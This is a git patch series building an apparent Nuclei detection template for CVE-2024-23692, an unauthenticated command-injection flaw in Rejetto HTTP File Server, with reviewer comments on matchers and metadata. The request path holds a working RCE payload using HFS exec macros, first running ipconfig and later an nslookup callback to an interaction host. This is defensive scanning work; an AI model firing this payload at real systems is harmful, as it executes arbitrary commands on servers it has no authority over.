From e322f3142143be9fb01bf343bc1c7b30152e73ed Mon Sep 17 00:00:00 2001
From: johnk3r
Date: Fri, 7 Jun 2024 22:04:41 -0300
Subject: [PATCH 1/9] Create CVE-2024-23692
---
http/cves/2024/CVE-2024-23692 | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-23692
diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692
new file mode 100644
index 0000000000..5b4a4f401b
--- /dev/null
+++ b/http/cves/2024/CVE-2024-23692
@@ -0,0 +1,25 @@
+id: CVE-2024-23692
+
+info:
+ name: HFS Command Injection RCE
+ author: johnk3r
+ severity: critical
+ tags: rce,hfs,cve
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "Windows IP Configuration"
+ - "Host Name"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "Host Name .+ : ([^\r\n]+)"
From f3bcd3e920554a5915c0f78581b6731a757102d8 Mon Sep 17 00:00:00 2001
From: johnk3r
Date: Fri, 7 Jun 2024 22:08:35 -0300
Subject: [PATCH 2/9] Update CVE-2024-23692
---
http/cves/2024/CVE-2024-23692 | 15 ++++++++++++---
1 file changed, 12 insertions(+), 3 deletions(-)
diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692
index 5b4a4f401b..7c8569bf95 100644
--- a/http/cves/2024/CVE-2024-23692
+++ b/http/cves/2024/CVE-2024-23692
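Review bot: The `regex` matcher added in PATCH 1/9 lists two patterns with no `condition`, so the default OR applies and any response body that merely contains `Host Name` is reported as a critical RCE; add `condition: and` under that matcher so both strings must be present. The `info` block ships without a `description`, `reference` or `classification`, which leaves whoever triages a hit with nothing to check it against. The file is also created without a `.yaml` extension, so tooling that selects templates by extension may not load it.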
@@ -1,10 +1,19 @@ id: CVE-2024-23692 info: - name: HFS Command Injection RCE + name: Check Point Quantum Gateway - Information Disclosure author: johnk3r - severity: critical - tags: rce,hfs,cve + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rce requests: - method: GET From cc743cfc3ad0a4d80f6451b6f9e326d8d6def24a Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:10:18 -0300 Subject: [PATCH 3/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 7c8569bf95..f3a81865e7 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,11 +1,11 @@ id: CVE-2024-23692 info: - name: Check Point Quantum Gateway - Information Disclosure + name: Rejetto HTTP File Server - Template injection author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ 
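Review bot: The new `name` and `description` in the PATCH 2/9 hunk describe a different product and a different CVE (Check Point Quantum Gateway, CVE-2024-24919) than the template `id` CVE-2024-23692 and the HFS references and `shodan-query` added in the same hunk, so a finding would be reported under the wrong advisory. The drop from `severity: critical` to `high` looks like it came from the same pasted block rather than from a reassessment. `verified: true` is set while the request and matchers are unchanged, so it is worth confirming the flag reflects a test against an actual HFS instance.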
From 84f71fee89b8b8227fb8294bd7f26469cc918c5d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:12:47 -0300 Subject: [PATCH 4/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index f3a81865e7..76493f5f7d 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From d201d27254d3d0a55211894daf27d058537e8168 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:13:50 -0300 Subject: [PATCH 5/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 76493f5f7d..c8020027d8 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -8,7 +8,8 @@ info: This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce + - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 metadata: verified: true max-request: 1 From ff26a49d5d399b3eac593d277489752276673c07 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:51:25 -0300 Subject: [PATCH 6/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 29 +++++++++++++---------------- 1 file changed, 13 insertions(+), 16 deletions(-) 
diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index c8020027d8..e60a524677 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,15 +1,14 @@ id: CVE-2024-23692 info: - name: Rejetto HTTP File Server - Template injection + name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: critical + severity: high description: | - This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce - - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ metadata: verified: true max-request: 1 @@ -19,17 +18,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "Windows IP Configuration" - - "Host Name" + - type: word + part: interactsh_protocol + words: + - "dns" - extractors: - - type: regex - part: body - regex: - - "Host Name .+ : ([^\r\n]+)" + - type: status + status: + - 200 From 9fac5e2524b70384c8c25b6208f8e477ebbef6a1 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 8 Jun 2024 15:08:41 -0300 Subject: [PATCH 7/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
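Review bot: The first hunk of PATCH 6/9 reverts `severity` from `critical` to `high` and removes the `https://nvd.nist.gov/vuln/detail/CVE-2024-23692` reference, undoing PATCH 4/9 and 5/9 with nothing in the commit message to explain it; the edit looks like it was made on a stale copy of the file. The `name` and description lines change only in whitespace. Keep `severity: critical` and the NVD reference in this hunk.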
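Review bot: The matchers added in the second hunk of PATCH 6/9 accept a `dns` interaction plus `status: 200`, and neither condition ties the callback to the scanned product. The OAST hostname travels in the query string, so a proxy, WAF or URL-inspection service that resolves hostnames it sees can produce the same `dns` hit, and many servers answer 200 to unknown query parameters. Pair the interaction check with a matcher on `part: body` that looks for a string specific to the HFS page, so a reported finding means the request reached the affected software.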
diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index e60a524677..99cffeff67 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From 1f1295a37d39e038cd816484dcaaa635c889688e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 05:20:49 +0530 Subject: [PATCH 8/9] minor update --- http/cves/2024/CVE-2024-23692 | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 99cffeff67..aa8c5c5096 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -15,7 +15,7 @@ info: shodan-query: product:"HttpFileServer httpd" tags: cve,cve2024,hfs,rce -requests: +http: - method: GET path: - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" @@ -27,6 +27,7 @@ requests: words: - "dns" - - type: status - status: - - 200 + - type: word + part: body + words: + - "rejetto" From 6091f89bfbdf1b82e53d47269872e7ed6f4c1a1d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 16:59:08 +0530 Subject: [PATCH 9/9] Update and rename CVE-2024-23692 to CVE-2024-23692.yaml --- http/cves/2024/{CVE-2024-23692 => CVE-2024-23692.yaml} | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) rename http/cves/2024/{CVE-2024-23692 => CVE-2024-23692.yaml} (83%) 
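Review bot: The body matcher added in the second hunk of PATCH 8/9 compares `rejetto` case-sensitively, which is the default for `word` matchers, so a page that renders the vendor name with different capitalisation is missed even when the DNS interaction fired; add `case-insensitive: true` to that matcher. Replacing the `status` matcher with a product fingerprint is the stronger check. A DNS interaction still only shows that something resolved the hostname, so the description could say that a hit indicates likely command execution and should be confirmed on the host.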
diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692.yaml similarity index 83% rename from http/cves/2024/CVE-2024-23692 rename to http/cves/2024/CVE-2024-23692.yaml index aa8c5c5096..97807850d9 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692.yaml @@ -9,11 +9,16 @@ info: reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23692 + cwe-id: CWE-1336 metadata: verified: true max-request: 1 shodan-query: product:"HttpFileServer httpd" - tags: cve,cve2024,hfs,rce + tags: cve,cve2024,hfs,rejetto,rce http: - method: GET
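Review bot: The `reference` list shown as context in the PATCH 9/9 hunk still lacks the NVD entry that PATCH 5/9 added and PATCH 6/9 removed; restore `- https://nvd.nist.gov/vuln/detail/CVE-2024-23692` alongside the new `classification` block. The `info` block also has no `remediation` field, and the description does not name the affected versions (the second reference URL suggests 2.3m), so a defender reading a hit does not learn what to upgrade or take offline. Adding both would make the finding actionable without changing detection.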